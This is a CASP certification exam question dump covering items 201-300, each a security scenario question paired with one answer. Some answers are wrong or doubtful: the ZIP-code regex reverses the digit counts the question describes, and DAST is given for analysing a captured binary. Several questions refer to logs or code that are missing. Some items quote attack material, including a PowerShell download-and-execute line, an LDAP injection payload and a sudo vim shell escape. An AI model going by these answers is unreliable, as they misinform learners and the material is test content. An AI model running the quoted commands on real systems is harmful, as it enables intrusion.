CASP (201-300)


A company invested a total of $10 million for a new storage solution installed across five on-site datacenters. Fifty percent of the cost of this investment was for solid-state storage. Due to the high rate of wear on this storage, the company is estimating that 5% will need to be replaced per year. Which of the following is the ALE due to storage replacement?

$250,000

A security compliance requirement states that specific environments that handle sensitive data must be protected by need-to-know restrictions and can only connect to authorized endpoints. The requirement also states that a DLP solution within the environment must be used to control the data from leaving the environment. Which of the following should be implemented for privileged users so they can support the environment from their workstations while remaining compliant?

A jump box in the screened subnet

An organization developed a social media application that is used by customers in multiple remote geographic locations around the world. The organization's headquarters and only datacenter are located in New York City. The Chief Information Security Officer wants to ensure the following requirements are met for the social media application: • Low latency for all mobile users to improve the users' experience • SSL offloading to improve web server performance • Protection against DoS and DDoS attacks • High availability Which of the following should the organization implement to BEST ensure all requirements are met?

A load-balanced group of reverse proxy servers with SSL acceleration

A company undergoing digital transformation is reviewing the resiliency of a CSP and is concerned about meeting SLA requirements in the event of a CSP incident. Which of the following would be BEST to proceed with the transformation?

A multicloud provider solution

An organization is assessing the security posture of a new SaaS CRM system that handles sensitive PII and identity information, such as passport numbers. The SaaS CRM system does not meet the organization's current security standards. Post remediation work, the assessment recorded the following: 1. There will be a $20.000 per day revenue loss for each day the system is delayed going into production. 2. The inherent risk was high. 3. The residual risk is now low. 4. The solution rollout to the contact center will be a staged deployment. Which of the following risk-handling techniques will BEST meet the organization's requirements post remediation?

Accept the risk, as compensating controls have been implemented to manage the risk.

A security administrator configured the account policies per security implementation guidelines. However, the accounts still appear to be susceptible to brute-force attacks. The following settings meet the existing compliance guidelines: • Must have a minimum of 15 characters • Must use one number • Must use one capital letter • Must not be one of the last 12 passwords used Which of the following policies should be added to provide additional security?

Account lockout

An organization is prioritizing efforts to remediate or mitigate risks identified during the latest assessment. For one of the risks, a full remediation was not possible, but the organization was able to successfully apply mitigations to reduce the likelihood of impact. Which of the following should the organization perform NEXT?

Assess the residual risk.

A company has moved its sensitive workloads to the cloud and needs to ensure high availability and resiliency of its web-based application. The cloud architecture team was given the following requirements: • The application must run at 70% capacity at all times • The application must sustain DoS and DDoS attacks. • Services must recover automatically. Which of the following should the cloud architecture team implement? (Choose three.)

CDN, WAF, and Autoscaling

A vulnerability assessment endpoint generated a report of the latest findings. A security analyst needs to review the report and create a priority list of items that must be addressed. Which of the following should the analyst use to create the list quickly?

CVSS Scores

A developer is creating a new mobile application for a company. The application uses REST API and TLS 1.2 to communicate securely with the external back-end server. Due to this configuration, the company is concerned about HTTPS interception attacks. Which of the following would be the BEST solution against this type of attack?

Certificate pinning

A local government that is investigating a data exfiltration claim was asked to review the fingerprint of the malicious user's actions. An investigator took a forensic image of the VM and downloaded the image to a secured USB drive to share with the government. Which of the following should be taken into consideration during the process of releasing the drive to the government?

Chain of Custody

A forensic investigator started the process of gathering evidence on a laptop in response to an incident. The investigator took a snapshot of the hard drive, copied relevant log files, and then performed a memory dump. Which of the following steps in the process should have occurred FIRST?

Collect the most volatile data.

A business wants to migrate its workloads from an exclusively on-premises IT infrastructure to the cloud but cannot implement all the required controls. Which of the following BEST describes the risk associated with this implementation?

Compliance risk

A company created an external application for its customers. A security researcher now reports that the application has a serious LDAP injection vulnerability that could be leveraged to bypass authentication and authorization. Which of the following actions would BEST resolve the issue? (Choose two.)

Conduct input sanitization and deploy a WAF.

A security analyst notices a number of SIEM events that show the following activity: Which of the following response actions should the analyst take FIRST?

Configure the forward proxy to block 40.90.23.154.

A cloud engineer is tasked with improving the responsiveness and security of a company's cloud-based web application. The company is concerned that international users will experience increased latency. Which of the following is the BEST technology to mitigate this concern?

Content delivery network

A security analyst is performing a vulnerability assessment on behalf of a client. The analyst must define what constitutes a risk to the organization. Which of the following should be the analyst's FIRST action?

Create a full inventory of information and data assets.

A security researcher has been given an executable that was captured by a honeypot. Which of the following should the security researcher implement to test the executable?

DAST (Dynamic Application Security Testing)

An organization is developing a disaster recovery plan that requires data to be backed up and available at a moment's notice. Which of the following should the organization consider FIRST to address this requirement?

Design an appropriate warm site for business continuity.

An analyst received a list of IOCs from a government agency. The attack has the following characteristics: 1. The attack starts with bulk phishing. 2. If a user clicks on the link, a dropper is downloaded to the computer. 3. Each of the malware samples has unique hashes tied to the user. The analyst needs to identify whether existing endpoint controls are effective. Which of the following risk mitigation techniques should the analyst use?

Detonate in a sandbox

A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell IEX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois Which of the following security controls would have alerted and prevented the next phase of the attack?

EDR and application approved list

An organization decided to begin issuing corporate mobile device users microSD HSMs that must be installed in the mobile devices in order to access corporate resources remotely. Which of the following features of these devices MOST likely led to this decision? (Choose two.)

Embedded cryptoprocessor & Hardware-backed public key storage

Company A acquired Company B. During an initial assessment, the companies discover they are using the same SSO system. To help users with the transition, Company A is requiring the following: • Before the merger is complete, users from both companies should use a single set of usernames and passwords. • Users in the same departments should have the same set of rights and privileges, but they should have different sets of rights and privileges if they have different IPs. • Users from Company B should be able to access Company A's available resources. Which of the following are the BEST solutions? (Choose two.)

Establishing one-way trust from Company B to Company A and Enabling SAML

Which of the following is a risk associated with SDN?

Expanded attack surface

In order to authenticate employees who call in remotely, a company's help desk staff must be able to view partial information about employees because the full information may be considered sensitive. Which of the following solutions should be implemented to authenticate employees?

Field masking

Which of the following is required for an organization to meet the ISO 27018 standard?

GDPR equivalent standards must be met

An architect is designing a security scheme for an organization that is concerned about APTs. Any proposed architecture must meet the following requirements: • Services must be able to be reconstituted quickly from a known-good state. • Network services must be designed to ensure multiple diverse layers of redundancy. • Defensive and responsive actions must be automated to reduce human operator demands. Which of the following designs must be considered to ensure the architect meets these requirements? (Choose three.)

Geographic distribution of critical data and services, hardened and verified container usage and establishment of warm and hot sites for continuity of operations

A server in a manufacturing environment is running an end-of-life operating system. The vulnerability management team is recommending that the server be upgraded to a supported operating system, but the ICS software running on the server is not compatible with modern operating systems. Which of the following compensating controls should be implemented to BEST protect the server?

HIPS

A security architect updated the security policy to require a proper way to verify that packets received between two parties have not been tampered with and the connection remains private. Which of the following cryptographic techniques can be used to ensure the security policy is being enforced properly?

HMAC_SHA256

A cloud security architect has been tasked with finding a solution for hardening VMs. The solution must meet the following requirements: • Data needs to be stored outside of the VMs. • No unauthorized modifications to the VMs are allowed. • If a change needs to be done, a new VM needs to be deployed. Which of the following is the BEST solution?

Immutable system

A high-severity vulnerability was found on a web application and introduced to the enterprise. The vulnerability could allow an unauthorized user to utilize an open-source library to view privileged user information. The enterprise is unwilling to accept the risk, but the developers cannot fix the issue right away. Which of the following should be implemented to reduce the risk to an acceptable level until the issue can be fixed?

Implement MFA, review the application logs, and deploy a WAF

A large healthcare provider utilizes IoT devices to monitor patients' heart rhythms. Which of the following is the BEST way to ensure that data collected from the IoT devices is protected from unauthorized access?

Implement SSL/TLS for the data in transit.

A security analyst at a global financial firm was reviewing the design of a cloud-based system to identify opportunities to improve the security of the architecture. The system was recently involved in a data breach after a vulnerability was exploited within a virtual machine's operating system. The analyst observed the VPC in which the system was located was not peered with the security VPC that contained the centralized vulnerability scanner due to the cloud provider's limitations. Which of the following is the BEST course of action to help prevent this situation in the near future?

Implement a centralized network gateway to bridge network traffic between all VPCs

After a security incident, a network security engineer discovers that a portion of the company's sensitive external traffic has been redirected through a secondary ISP that is not normally used. Which of the following would BEST secure the routes while allowing the network to function in the event of a single provider failure?

Implement an inbound BGP prefix list

A company wants to securely manage the APIs that were developed for its in-house applications. Previous penetration tests revealed that developers were embedding unencrypted passwords in the code. Which of the following can the company do to address this finding? (Choose two.)

Implement complex, key-length API key management and Incorporate a DAST into the DevSecOps process to identify the exposure of secrets.

A software company decides to study and implement some new security features in the software it develops in C++ language. Developers are trying to find a way to avoid a malicious process that can access another process's execution area. Which of the following techniques can the developers do?

Implement memory encryption

A company hosts a large amount of data in blob storage for its customers. The company recently had a number of issues with this data being prematurely deleted before the scheduled backup processes could be completed. The management team has asked the security architect for a recommendation that allows blobs to be deleted occasionally, but only after a successful backup. Which of the following solutions will BEST meet this requirement?

Implement soft delete for blobs.

An organization offers SaaS services through a public email and storage provider. To facilitate password resets, a simple online system is set up. During a routine check of the storage each month, a significant increase in use of storage can be seen. Which of the following techniques would remediate the attack?

Implementing a new password reset system

A significant weather event caused all systems to fail over to the disaster recovery site successfully. However, successful data replication has not occurred in the last six months, which has resulted in the service being unavailable. Which of the following would BEST prevent this scenario from happening again?

Implementing scheduled, full interruption tests

A security analyst discovered that the company's WAF was not properly configured. The main web server was breached, and the following payload was found in one of the malicious requests: (&(objectClass=*)(objectClass=*))(&(objectClass=void)(type=admin)) Which of the following would BEST mitigate this vulnerability?

Input validation

A software assurance analyst reviews an SSH daemon's source code and sees the following: Based on this code snippet, which of the following attacks is MOST likely to succeed?

Integer overflow

A host on a company's network has been infected by a worm that appears to be spreading via SMB. A security analyst has been tasked with containing the incident while also maintaining evidence for a subsequent investigation and malware analysis. Which of the following steps would be best to perform FIRST?

Isolate the infected host from the network by removing all network connections.

Which of the following terms refers to the delivery of encryption keys to a CASB or a third-party entity?

Key Distribution

A company has hired a third party to develop software as part of its strategy to be quicker to market. The company's policy outlines the following requirements: ✑ The credentials used to publish production software to the container registry should be stored in a secure location. ✑ Access should be restricted to the pipeline service account, without the ability for the third-party developer to read the credentials directly. Which of the following would be the BEST recommendation for storing and monitoring access to these shared credentials?

Key Vault

The Chief Information Officer (CIO) wants to implement enterprise mobility throughout the organization. The goal is to allow employees access to company resources. However, the CIO wants the ability to enforce configuration settings, manage data, and manage both company-owned and personal devices. Which of the following should the CIO implement to achieve this goal?

MDM

Which of the following is the MOST important cloud-specific risk from the CSP's viewpoint?

Management plane breach

A company recently acquired a SaaS provider and needs to integrate its platform into the company's existing infrastructure without impact to the customer's experience. The SaaS provider does not have a mature security program. A recent vulnerability scan of the SaaS provider's systems shows multiple critical vulnerabilities attributed to very old and outdated OSs. Which of the following solutions would prevent these vulnerabilities from being introduced into the company's existing infrastructure?

Migrate the services to new systems with a supported and patched OS.

A company is looking to fortify its cybersecurity defenses and is focusing on its network infrastructure. The solution cannot affect the availability of the company's services to ensure false positives do not drop legitimate traffic. Which of the following would satisfy the requirement?

NIDS or Network Intrusion Detection System

A vulnerability analyst identified a zero-day vulnerability in a company's internally developed software. Since the current vulnerability management system does not have any checks for this vulnerability, an engineer has been asked to create one. Which of the following would be BEST suited to meet these requirements?

OVAL

A security architect is implementing a web application that uses a database back end. Prior to production, the architect is concerned about the possibility of XSS attacks and wants to identify security controls that could be put in place to prevent these attacks. Which of the following sources could the architect consult to address this security concern?

OWASP

A software developer created an application for a large, multinational company. The company is concerned the program code could be reverse engineered by a foreign entity and intellectual property would be lost. Which of the following techniques should be used to prevent this situation?

Obfuscation

A software developer is working on a piece of code required by a new software package. The code should use a protocol to verify the validity of a remote identity. Which of the following should the developer implement in the code?

Online Certificate Status Protocol (OCSP).

During a recent security incident investigation, a security analyst mistakenly turned off the infected machine prior to consulting with a forensic analyst. Upon rebooting the machine, a malicious script that was running as a background process was no longer present. As a result, potentially useful evidence was lost. Which of the following should the security analyst have followed?

Order of volatility

A healthcare system recently suffered from a ransomware incident. As a result, the board of directors decided to hire a security consultant to improve existing network security. The security consultant found that the healthcare network was completely flat, had no privileged access limits, and had open RDP access to servers with personal health information. As the consultant builds the remediation plan, which of the following solutions would BEST solve these challenges? (Choose three.)

PAM & Network Segmentation & NAC

A security analyst discovered that a database administrator's workstation was compromised by malware. After examining the logs, the compromised workstation was observed connecting to multiple databases through ODBC. The following query behavior was captured: Assuming this query was used to acquire and exfiltrate data, which of the following types of data was compromised, and what steps should the incident response plan contain?

PAN; Inform the legal department of the breach and look for this data in dark web monitoring.

An organization recently started processing, transmitting, and storing its customers' credit card information. Within a week of doing so, the organization suffered a massive breach that resulted in the exposure of the customers' information. Which of the following provides the BEST guidance for protecting such information while it is at rest and in transit?

PCI DSS

A Chief Information Officer (CIO) wants to implement a cloud solution that will satisfy the following requirements: ✑ Support all phases of the SDLC. ✑ Use tailored website portal software. ✑ Allow the company to build and use its own gateway software. ✑ Utilize its own data management platform. ✑ Continue using agent-based security tools. Which of the following cloud-computing models should the CIO implement?

PaaS (Platform as a Service)

A security analyst needs to recommend a remediation to the following threat: Which of the following actions should the security analyst propose to prevent this successful exploitation?

Patch the system

A software developer was just informed by the security team that the company's product has several vulnerabilities. Most of these vulnerabilities were traced to code the developer did not write. The developer does not recognize some of the code, as it was in the software before the developer started on the program and is not tracked for licensing purposes. Which of the following would the developer MOST likely do to mitigate the risks and prevent further issues like these from occurring?

Perform software composition analysis and remediate vulnerabilities found in the software.

A home automation company just purchased and installed tools for its SOC to enable incident identification and response on software the company develops. The company would like to prioritize defenses against the following attack scenarios: • Unauthorized insertions into application development environments • Authorized insiders making unauthorized changes to environment configurations Which of the following actions will enable the data feeds needed to detect these types of attacks on development environments? (Choose two.)

Perform static code analysis of committed code and generate summary reports and Monitor dependency management tools and report on susceptible third-party libraries.

Technicians have determined that the current server hardware is outdated, so they have decided to throw it out. Prior to disposal, which of the following is the BEST method to use to ensure no data remnants can be recovered?

Physical Destruction

An organization recently experienced a ransomware attack. The security team leader is concerned about the attack reoccurring. However, no further security measures have been implemented. Which of the following processes can be used to identify potential prevention recommendations?

Preparation

An organization is looking to establish more robust security measures by implementing PKI. Which of the following should the security analyst implement when considering mutual authentication?

Public keys on both endpoints

A company wants to harden its network infrastructure and has established the following requirements for its physical network devices: • Active Directory authentication and authorization should be attempted first, but local authentication and authorization is permitted if Active Directory fails or is unavailable. • An event-based authentication factor must be used. • Administrative actions must be logged. Which of the following should the company implement to meet the requirements? (Select TWO).

RADIUS and TACACS+

A MSSP has taken on a large client that has government compliance requirements. Due to the sensitive nature of communications to its aerospace partners, the MSSP must ensure that all communications to and from the client web portal are secured by industry-standard asymmetric encryption methods. Which of the following should the MSSP configure to BEST meet this objective?

RSA (Rivest-Shamir-Adleman)

An auditor needs to scan documents at rest for sensitive text. These documents contain both text and images. Which of the following software functionalities must be enabled in the DLP solution for the auditor to be able to fully read these documents? (Choose two.)

Regular expression pattern matching and Optical character recognition functionality

A company launched a new service and created a landing page within its website network for users to access the service. Per company policy, all websites must utilize encryption for any authentication pages. A junior network administrator proceeded to use an outdated procedure to order new certificates. Afterward, customers are reporting the following error when accessing a new web page: NET:ERR_CERT_COMMON_NAME_INVALID. Which of the following BEST describes what the administrator should do NEXT?

Request a new certificate with the correct subject alternative name that includes the new websites.

A security architect is given the following requirements to secure a rapidly changing enterprise with an increasingly distributed and remote workforce: ✑ Cloud-delivered services ✑ Full network security stack ✑ SaaS application security management ✑ Minimal latency for an optimal user experience ✑ Integration with the cloud IAM platform Which of the following is the BEST solution?

SASE (Secure Access Service Edge)

Given the following log snippet from a web server: Which of the following BEST describes this type of attack?

SQL Injection

A firewall administrator needs to ensure all traffic across the company network is inspected. The administrator gathers data and finds the following information regarding the typical traffic in the network: Which of the following is the BEST solution to ensure the administrator can complete the assigned task?

SSL/TLS decryption

A security administrator sees several hundred entries in a web server security log that are similar to the following: Staten Island, New York, United States was blocked 10 minutes for exceeding the maximum requests per minute at URL https://companysite.net/xmlrpc.php 6/7/2021 10:05:15 AM, IP: 151.205.188.74 Hostname: pool-151.205.188.74-nycmny.isp.net Status: 503 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Chrome/90.0.44 Safari/537.36 WHOIS: ISP.net (NET-151-196-0-0-1) 151.196.0.0 - 151.205.255.255 The network source varies, but the URL, status, and user agent are the same. Which of the following would BEST protect the web server without blocking legitimate traffic?

Script the daily collection of the WHOIS ranges to add to the WAF as a denied ACL.

A security architect is analyzing an old application that is not covered for maintenance anymore because the software company is no longer in business. Which of the following techniques should have been implemented to prevent these types of risks?

Source code escrows

During a system penetration test, a security engineer successfully gained access to a shell on a Linux host as a standard user and wants to elevate the privilege levels. Which of the following is a valid Linux post-exploitation method to use to accomplish this goal?

Spawn a shell using sudo and an escape string such as sudo vim -c '!sh'.

A security analyst just identified an increase in the amount of corporate traffic containing media in the last 24 hours. Which of the following describes the method used to identify messages potentially hidden in the media files?

Steganalysis is the method used to identify messages or hidden data within media files, such as images, audio, or video files

An organization has an operational requirement with a specific equipment vendor. The organization is located in the United States, but the vendor is located in another region. Which of the following risks would be MOST concerning to the organization in the event of equipment failure?

Support may not be available during all business hours.

A global organization's Chief Information Security Officer (CISO) has been asked to analyze the risks involved in a plan to move the organization's current MPLS-based WAN network to use commodity internet and SD-WAN hardware. The SD-WAN provider is currently highly regarded but is a regional provider. Which of the following is MOST likely identified as a potential risk by the CISO?

The SD-WAN provider may not be able to support the required troubleshooting and maintenance.

A new web server must comply with new secure-by-design principles and PCI DSS. This includes mitigating the risk of an on-path attack. A security analyst is reviewing the following web server configuration: Which of the following ciphers should the security analyst remove to support the business requirements?

The TLS_DHE_DSS_WITH_RC4_128_SHA cipher should be removed from the web server configuration since it uses the insecure RC4 encryption algorithm, which is vulnerable to on-path attacks

A client is adding scope to a project. Which of the following processes should be used when requesting updates or corrections to the client's systems?

The change control board must review and approve a submission.

A penetration tester is testing a company's login form for a web application using a list of known usernames and a common password list. According to a brute-force utility, the penetration tester needs to provide the tool with the proper headers, POST URL with variable names, and the error string returned with an improper login. Which of the following would BEST help the tester to gather this information? (Choose two.)

The inspect feature from the web browser and An HTTP interceptor

A security analyst is evaluating the security of an online customer banking system. The analyst has a 12-character password for the test account. At the login screen, the analyst is asked to enter the third, eighth, and eleventh characters of the password. Which of the following describes why this request is a security concern? (Choose two.)

The request is evidence that the password is more open to being captured via a keylogger & The request proves a potential attacker only needs to be able to guess or brute force three characters rather than 12 characters of the password.

A business stores personal client data of individuals residing in the EU in order to process requests for mortgage loan approvals. Which of the following does the business's IT manager need to consider?

The right to personal data erasure.

A recent security audit identified multiple endpoints have the following vulnerabilities: • Various unsecured open ports • Active accounts for terminated personnel • Endpoint protection software with legacy versions • Overly permissive access rules Which of the following would BEST mitigate these risks? (Choose three).

Unneeded services disabled, Patching and Removal of unused accounts

A security architect works for a manufacturing organization that has many different branch offices. The architect is looking for a way to reduce traffic and ensure the branch offices receive the latest copy of revoked certificates issued by the CA at the organization's headquarters location. The solution must also have the lowest power requirement on the CA. Which of the following is the BEST solution?

Use Delta CRLs at the branches.

A security architect for a manufacturing company must ensure that a new acquisition of IoT devices is securely integrated into the company's infrastructure. The devices should not directly communicate with other endpoints on the network and must be subject to network traffic monitoring to identify anomalous traffic. Which of the following would be the BEST solution to meet these requirements?

Use a separate VLAN with an ACL and implement network detection and response.

A company would like to obfuscate PII data accessed by an application that is housed in a database to prevent unauthorized viewing. Which of the following should the company do to accomplish this goal?

Use cell-level encryption

A security engineer thinks the development team has been hard-coding sensitive environment variables in its code. Which of the following would BEST secure the company's CI/CD pipeline?

Utilizing a trusted secrets manager

A company plans to build an entirely remote workforce that utilizes a cloud-based infrastructure. The Chief Information Security Officer asks the security engineer to design connectivity to meet the following requirements: • Only users with corporate-owned devices can directly access servers hosted by the cloud provider. • The company can control what SaaS applications each individual user can access. • User browser activity can be monitored. Which of the following solutions would BEST meet these requirements?

VPN, CASB, and secure web gateway

Which of the following communication protocols is used to create PANs with small, low-power digital radios and supports a large number of nodes?

Zigbee is a communication protocol that is used to create Personal Area Networks (PANs) with small, low-power digital radios

A security analyst is reviewing a new IOC in which data is injected into an online process. The IOC shows the data injection could happen in the following ways: • Five numerical digits followed by a dash, followed by four numerical digits, or • Five numerical digits When one of these IOCs is identified, the online process stops working. Which of the following regular expressions should be implemented in the NIPS?

^\d{4}(-\d{5})?$

In comparison to other types of alternative processing sites that may be invoked as a part of disaster recovery, cold sites are different because they:

are geographically separated from the company's primary facilities.

A company that is operating a Unix legacy system is concerned about the strength of the system's password settings. The legacy system does not allow passwords that are longer than eight characters; therefore, the system has been configured to only accept passwords that are exactly eight characters long. Which of the following will work BEST to strengthen the stored passwords against off-line password cracking for this system?

bcrypt is the best choice to strengthen the stored passwords against off-line password cracking for the given Unix legacy system.

An employee's device was missing for 96 hours before being reported. The employee called the help desk to ask for another device. Which of the following phases of the incident response cycle needs improvement?

containment

A shipping company that is trying to eliminate entire classes of threats is developing an SELinux policy to ensure its custom Android devices are used exclusively for package tracking. After compiling and implementing the policy, in which of the following modes must the company ensure the devices are configured to run?

enforcing

A security engineer based in Iceland works in an environment requiring an on-premises and cloud-based storage solution. The solution should take into consideration the following: 1. The company has sensitive data. 2. The company has proprietary data. 3. The company has its headquarters in Iceland, and the data must always reside in that country. Which cloud deployment model should be used?

hybrid cloud

An organization is researching the automation capabilities for systems within an OT network. A security analyst wants to assist with creating secure coding practices and would like to learn about the programming languages used on the PLCs. Which of the following programming languages is the MOST relevant for PLCs?

ladder logic

A security engineer needs to implement a CASB to secure employee user web traffic. A key requirement is that the relevant event data must be collected from existing on-premises infrastructure components and consumed by the CASB to expand traffic visibility. The solution must be highly resilient to network outages. Which of the following architectural components would BEST meet these requirements?

log collection

The principal security analyst for a global manufacturer is investigating a security incident related to abnormal behavior in the ICS network. A controller was restarted as part of the troubleshooting process, and the following issue was identified when the controller was restarted: SECURE BOOT FAILED: FIRMWARE MISMATCH EXPECTED 0xFDC479 ACTUAL 0x79F31B During the investigation, this modified firmware version was identified on several other controllers at the site. The official vendor firmware versions do not have this checksum. Which of the following stages of the MITRE ATT&CK framework for ICS includes this technique?

persistence

Signed applications reduce risks by:

providing assurance that the application is using unmodified source code

A startup software company recently updated its development strategy to incorporate the Software Development Life Cycle, including revamping the quality assurance and release processes for gold builds. Which of the following would most likely be developed FIRST as part of the overall strategy?

security requirements

